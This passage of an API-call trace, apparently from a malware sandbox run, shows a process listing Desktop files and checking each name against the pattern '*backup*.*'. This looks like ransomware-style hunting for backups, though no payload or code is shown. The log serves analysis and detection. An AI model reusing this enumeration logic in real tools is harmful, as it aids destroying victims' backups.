lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d20 [0110.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.914] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*backup*.*") returned 0 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.914] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.914] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.914] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.914] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SWeD.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt" [0110.914] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.914] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.914] lstrcatW (in: lpString1="\\", lpString2="SWeD.odt" | out: lpString1="\\SWeD.odt") returned="\\SWeD.odt" [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eacb8 [0110.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a3258 [0110.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a3258, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3258 | out: hHeap=0x29a0000) returned 1 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eacb8 | out: hHeap=0x29a0000) returned 1 [0110.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e40 [0110.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e40, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.914] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.914] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*backup*.*") returned 0 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.914] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.914] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.914] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv" [0110.915] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.915] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.915] lstrcatW (in: lpString1="\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="\\UQk58h 9TQk7yvi7D.mkv") returned="\\UQk58h 9TQk7yvi7D.mkv" [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea618 [0110.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x38ea618, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea618 | out: hHeap=0x29a0000) returned 1 [0110.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e40 [0110.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e40, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.915] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*backup*.*") returned 0 [0110.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.915] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.915] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx" [0110.915] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.915] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.915] lstrcatW (in: lpString1="\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="\\VAHC8zDa9SevTeoKicIh.docx") returned="\\VAHC8zDa9SevTeoKicIh.docx" [0110.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a29c0 [0110.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a29c0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e40 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d20 [0110.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.916] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*backup*.*") returned 0 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.916] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.916] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.916] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.916] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VbI-8gh.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv" [0110.916] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.916] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.916] lstrcatW (in: lpString1="\\", lpString2="VbI-8gh.mkv" | out: lpString1="\\VbI-8gh.mkv") returned="\\VbI-8gh.mkv" [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.916] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e00 [0110.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970498 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e00 | out: hHeap=0x29a0000) returned 1 [0110.917] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*backup*.*") returned 0 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970498 | out: hHeap=0x29a0000) returned 1 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.917] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.917] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.917] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.917] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="wwAL7t.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4" [0110.917] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.917] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.917] lstrcatW (in: lpString1="\\", lpString2="wwAL7t.mp4" | out: lpString1="\\wwAL7t.mp4") returned="\\wwAL7t.mp4" [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c60 [0110.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.917] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c60 | out: hHeap=0x29a0000) returned 1 [0110.917] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*backup*.*") returned 0 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.917] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.917] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.917] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.917] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg" [0110.918] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.918] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.918] lstrcatW (in: lpString1="\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="\\XDMAiqRYF.jpg") returned="\\XDMAiqRYF.jpg" [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.918] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.918] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c20 [0110.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.918] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.918] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*backup*.*") returned 0 [0110.918] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.918] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.918] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.918] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" 